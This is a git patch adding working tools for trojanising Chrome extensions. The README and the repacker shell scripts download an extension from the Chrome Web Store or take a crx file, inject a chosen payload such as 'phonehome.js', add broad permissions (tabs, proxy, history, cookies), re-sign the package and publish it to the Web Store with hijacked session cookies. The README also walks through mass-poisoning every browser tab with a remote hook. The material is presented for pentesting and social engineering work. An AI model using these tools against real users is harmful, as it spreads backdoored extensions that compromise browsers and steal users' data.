From 2105121c937b14d70e1f3a280dad8c8007613c8d Mon Sep 17 00:00:00 2001 From: Krzysztof Kotowicz Date: Tue, 18 Mar 2014 12:56:57 +0100 Subject: [PATCH] added new files, readme and contact info --- .../chrome_extensions_exploitation/README.md | 87 +++++++++++++ .../injector/chrome_extension_toolkit.rb | 2 +- .../injector/config.ini | 9 ++ .../injector/inject.rb | 2 +- .../injector/repacker-crx.sh | 117 ++++++++++++++++++ .../injector/repacker-webstore.sh | 100 +++++++++++++++ 6 files changed, 315 insertions(+), 2 deletions(-) create mode 100644 tools/chrome_extensions_exploitation/README.md create mode 100644 tools/chrome_extensions_exploitation/injector/config.ini create mode 100755 tools/chrome_extensions_exploitation/injector/repacker-crx.sh create mode 100755 tools/chrome_extensions_exploitation/injector/repacker-webstore.sh diff --git a/tools/chrome_extensions_exploitation/README.md b/tools/chrome_extensions_exploitation/README.md new file mode 100644 index 000000000..8570726b2 --- /dev/null +++ b/tools/chrome_extensions_exploitation/README.md @@ -0,0 +1,87 @@ +Various tools for dealing with Chrome Extensions, especially valuable for pentesting / social engineering assignments. + +Authors: + + - Krzysztof Kotowicz - @kkotowicz - [blog](http://blog.kotowicz.net) + - Michele '@antisnatchor' Orru + + +Injector +-------- +Bunch of scripts for injecting existing extensions with new code: +Extensions can be downloaded from Chrome WebStore (repacker-webstore) or taken from crx files (repacker-crx). + +Requirements: + + - bash + - ruby + - zip (cmd line) + - curl (cmd line) + - Google Chrome (used in crx mode only) + +Usage: + + # get extension from Web Store, add payloads/phonehome.js and copy the extension to repacked-dir/ + $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk dir repacked-dir payloads/phonehome.js + + # Same, but pack into repacked.zip instead + $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js + + # Create new CRX with Google Chrome + $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk crx repacked.crx payloads/phonehome.js + + # Inject into existing CRX file + $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js + + # Add some permissions into manifest.json + $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/phonehome.js "tabs,proxy" + + # Add persistent content script file launching on every tab + $ echo 'console.log(location.href)' > cs.js + $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs," cs.js + +For example - mass poisoning every tab with [mosquito](https://github.com/koto/mosquito): + + # start mosquito server: + $ cd path/to/mosquito + $ python mosquito/start.py 8082 4444 --http 8000 + + # generate mosquito hook: + # - visit http://localhost:8000/generate + # - save hook as cs.js + + # inject mosquito dropper into extension: + $ injector/repacker-crx.sh original.crx crx repacked.crx payloads/cs_mass_poison.js "tabs," cs.js + + +Webstore Uploader +----------------- +Script for uploading and publishing Chrome Extensions packed in zip files in Chrome Web Store + +Requirements: + + - ruby + +Usage: + + # Preparation: + + 1. Create Chrome developer account + 2. Login at https://chrome.google.com/webstore/developer/dashboard/ + 3. Pay your $5 one time fee (credit card needed) + 4. Get SID, SSID, HSID cookies and paste their values in webstore_uploader/config.rb file + + # Get Chrome extension code + # e.g. run Injector in zip mode: + + $ injector/repacker-webstore.sh clcbnchcgjcjphmnpndoelbdhakdlfkk zip repacked.zip payloads/phonehome.js + + # (optional) - prepare screenshot / description file + + # publish the extension right away + $ ruby webstore_uploader/webstore_upload.rb repacked.zip publish description.txt screenshot.png + + # or just upload & save it: + $ ruby webstore_uploader/webstore_upload.rb repacked.zip save description.txt screenshot.png + + # you can access the extension from your developer dashboard \ No newline at end of file diff --git a/tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb b/tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb index 078870fca..bf498c273 100644 --- a/tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb +++ b/tools/chrome_extensions_exploitation/injector/chrome_extension_toolkit.rb @@ -2,7 +2,7 @@ # encoding: UTF-8 # Authors: -# Krzysztof Kotowicz - @kkotowicz +# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net require 'rubygems' require 'json' diff --git a/tools/chrome_extensions_exploitation/injector/config.ini b/tools/chrome_extensions_exploitation/injector/config.ini new file mode 100644 index 000000000..14d3ac6d6 --- /dev/null +++ b/tools/chrome_extensions_exploitation/injector/config.ini @@ -0,0 +1,9 @@ +#!/usr/bin/env bash + +# path to chrome binary +CHROMEPATH="/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" + +# Private key to sign repacked extensions with. +# Leave empty to generate new file on every run. +#PEM="/home/koto/dev/xsschef/tools/dev.pem" +PEM= \ No newline at end of file diff --git a/tools/chrome_extensions_exploitation/injector/inject.rb b/tools/chrome_extensions_exploitation/injector/inject.rb index a79500e00..a0739a522 100755 --- a/tools/chrome_extensions_exploitation/injector/inject.rb +++ b/tools/chrome_extensions_exploitation/injector/inject.rb @@ -2,7 +2,7 @@ # encoding: UTF-8 # Authors: -# Krzysztof Kotowicz - @kkotowicz +# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net require_relative 'chrome_extension_toolkit.rb' diff --git a/tools/chrome_extensions_exploitation/injector/repacker-crx.sh b/tools/chrome_extensions_exploitation/injector/repacker-crx.sh new file mode 100755 index 000000000..5d5200ba0 --- /dev/null +++ b/tools/chrome_extensions_exploitation/injector/repacker-crx.sh @@ -0,0 +1,117 @@ +#!/usr/bin/env bash + +# Authors: +# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net +# +# Unpacks a crx file, inject it with given payload, and, optionally +# packs it into zip/crx file +# see ../README.md + +DIR=$( cd "$( dirname "$0" )" && pwd ) +source $DIR/config.ini +RUNDIR=`pwd` +tempfoo=`basename $0` +TMPDIR=`mktemp -d -t ${tempfoo}` || exit 1 +EXTDIR="$TMPDIR" + +INPUT_CRX=$1 +MODE=$2 +DESTINATION=$3 +JS_FILE=$4 +shift 4 + +if [ ! -z "$1" ]; then # 5th param optional + PERMISSIONS=$1 + shift +else + PERMISSIONS="" +fi + +function help { + printf "Usage: %s: [permissions] [file1 ... ] \n" $(basename $0) >&2 + echo " - original extension CRX file" >&2 + echo " - output mode (dir|zip|crx)" >&2 + echo " - directory or file path to write injected extension to (depending on )" >&2 + echo " - script to inject into extension background" >&2 + echo " [permissions] - comma separated permissions requested by script (to add to manifest)">&2 + echo " [file...] - additional files to add to extension" >&2 + exit 2 +} + +if [[ $# -eq 0 ]] ; then + help +fi + +if [ ! -f "${INPUT_CRX}" ]; then + bailout "No input CRX file! - ${INPUT_CRX}" +fi + +if [ ! -f "${JS_FILE}" ]; then + bailout "No file to inject! - ${JS_FILE}" +fi + +if [ -z "$DESTINATION" ] || [ -z "$MODE" ]; then + bailout "You must give mode and destination!" +fi + +function cleanup { + rm -rf "$TMPDIR" +} + +function bailout () { + echo "Error: $1" >&2 + cleanup + exit 1 +} + +echo "Unpacking $INPUT_CRX to $EXTDIR..." +# supress warning about extra prefix bytes +unzip -qo "$INPUT_CRX" -d "$EXTDIR" 2>/dev/null +echo "Injecting script $JS_FILE..." + +$DIR/inject.rb "$EXTDIR" "$PERMISSIONS" < $JS_FILE || bailout "Injection failed" + +# copy additional files +for file in "$@" +do + + if [ -f "$file" ]; then + echo "Adding $file..." + cp "$file" "$EXTDIR" + fi +done + +echo "Mode: $MODE" + +case "$MODE" in + crx) + if [ ! -x "$CHROMEPATH" ]; then + bailout "You must set correct CHROMEPATH in tools/config.ini" + fi + + echo "Signing $EXTDIR..." + "$CHROMEPATH" --pack-extension="$EXTDIR" --pack-extension-key="$PEM" --no-message-box + if (( $? )) ; then + bailout "Signing in Chrome FAILED." + fi + + echo "Moving signed extension to $DESTINATION" + mv "`dirname "$EXTDIR"`/`basename "$EXTDIR"`.crx" "$DESTINATION" + ;; + zip) + echo "Zipping extension to $DESTINATION" + cd "$EXTDIR" + zip -r __tmp.zip . + cd - + mv "$EXTDIR/__tmp.zip" $DESTINATION + ;; + dir) + echo "Moving extension directory to $DESTINATION" + rm -r "$DESTINATION" + mv "$EXTDIR" "$DESTINATION" + ;; + *) + bailout "Unknown mode: $MODE" +esac + +cleanup diff --git a/tools/chrome_extensions_exploitation/injector/repacker-webstore.sh b/tools/chrome_extensions_exploitation/injector/repacker-webstore.sh new file mode 100755 index 000000000..a6d805d73 --- /dev/null +++ b/tools/chrome_extensions_exploitation/injector/repacker-webstore.sh @@ -0,0 +1,100 @@ +#!/usr/bin/env bash + +# Authors: +# Krzysztof Kotowicz - @kkotowicz - http://blog.kotowicz.net +# +# Downloads extension from Google Chrome Webstore, inject it with given payload, and, optionally +# packs it into zip/crx file +# see ../README.md + +RUNDIR=`pwd` +DIR=$( cd "$( dirname "$0" )" && pwd ) +tempfoo=`basename $0` +TMPDIR=`mktemp -d -t ${tempfoo}` || exit 1 + +function help { + printf "Usage: %s: [-q] [permissions] [file1 ...] \n" $(basename $0) >&2 + echo " -q : quiet, only repacked extension filename will be printed to stdout" >&2 + echo " - extension id from Chrome WebStore" >&2 + echo " - output mode (dir|zip|crx)" >&2 + echo " - directory or file path to write injected extension to (depending on )" >&2 + echo " - script to inject into extension background" >&2 + echo " [permissions] - comma separated permissions requested by script (to add to manifest)">&2 + echo " [file...] - additional files to add to extension" >&2 + exit 2 +} + +function cleanup { + rm -rf "$TMPDIR" + cd "$RUNDIR" +} + +function bailout () { + echo "Error: $1" >&2 + cleanup + exit 1 +} + +#Parsing command line parameters +QUIET= +PERMISSIONS="tabs,proxy,,history,cookies,management,plugins" + +while getopts 'qh' OPTION +do + case $OPTION in + q) QUIET="1" + ;; + h) help + ;; + *) help + ;; + esac +done + +shift $(($OPTIND - 1)) + +if [[ $# -eq 0 ]] ; then + help +fi + +EXT_ID="$1" +MODE="$2" +DESTINATION="$3" +JS_FILE="$4" +PERMISSIONS="$5" +shift 5 + +if [ -z "$EXT_ID" ]; then + bailout "No extension ID!" +fi + +if [ ! -f "${JS_FILE}" ]; then + bailout "No file to inject! - ${JS_FILE}" +fi + +if [ -z "$DESTINATION" ] || [ -z "$MODE" ]; then + bailout "You must give mode and destination!" +fi + +WEBSTORE_URL="https://clients2.google.com/service/update2/crx?response=redirect&x=id%3D${EXT_ID}%26lang%3Dpl%26uc" + +# offline test +# cp tmp/adblock.crx "$TMPDIR/org.crx" + +if [ "$QUIET" ]; then + curl -L "$WEBSTORE_URL" -o "$TMPDIR/org.crx" --silent +else + curl -L "$WEBSTORE_URL" -o "$TMPDIR/org.crx" +fi + +if (( $? )) ; then + bailout "CURL failed." +fi + +if [ "$QUIET" ]; then + $DIR/repacker-crx.sh "$TMPDIR/org.crx" "$MODE" "$DESTINATION" "$JS_FILE" "$PERMISSIONS" $@ >/dev/null || bailout "Repacker failed" + echo -n $DESTINATION +else + $DIR/repacker-crx.sh "$TMPDIR/org.crx" "$MODE" "$DESTINATION" "$JS_FILE" "$PERMISSIONS" $@ || bailout "Repacker failed" +fi +rm $TMPDIR/org.crx \ No newline at end of file